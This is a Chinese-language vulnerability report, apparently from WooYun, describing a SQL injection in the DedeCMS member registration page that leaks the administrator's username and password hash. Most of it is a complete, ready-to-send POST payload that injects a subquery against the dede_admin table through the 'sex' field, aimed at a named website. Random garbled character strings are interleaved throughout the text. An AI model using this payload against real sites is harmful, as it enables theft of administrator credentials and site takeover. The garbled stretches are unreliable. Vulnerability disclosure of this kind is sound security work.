漏洞类型: SQL注射漏洞
8 n5 [' Q) m' m9 l简要描述:- C: W% P, d7 a* z5 q
; D9 F( c W3 o5 `! J% o8 x7 n2 N/ R L需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.- e- V4 S9 }9 b
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
8 J3 Z, \ L" v# Z详细说明:跟这个漏洞
- k/ Z/ o, _4 Y" a' K" k3 i
' R }' Q! D; ~- J7 |$ xWooYun: Dedecms SQL注射导致审核机制绕过漏洞
! {" z! H1 x/ c$ C8 D是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.; e* T* c) G; L# F, x% P
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
6 d3 D; R3 r/ ]: J 6 ]3 B R8 |! C
www.political-security.com/member/reg_new.php
- M/ x8 n& M- r6 S: r. Q# g3 R ; o' T) c4 I# l8 S2 |# t/ t
POST
: G7 D& Q& V- {
2 ?% b _* Z9 h, q/ J' W D) t, jdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&' K" h$ c( Q: O7 t) H n8 r7 S
userid=c4rp3nt3r&uname=c4rp3nt3r; Q8 @1 @% ]+ r" s0 p( g
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
0 T X$ J! X+ z6 @* Y: F+ Z' m8 e4 }&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,: I7 w: e! B/ u. D( t) J3 `1 \
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
$ \% r- {, ]! v4 J r. Z; |" e%00&vdcode=glos&agree= |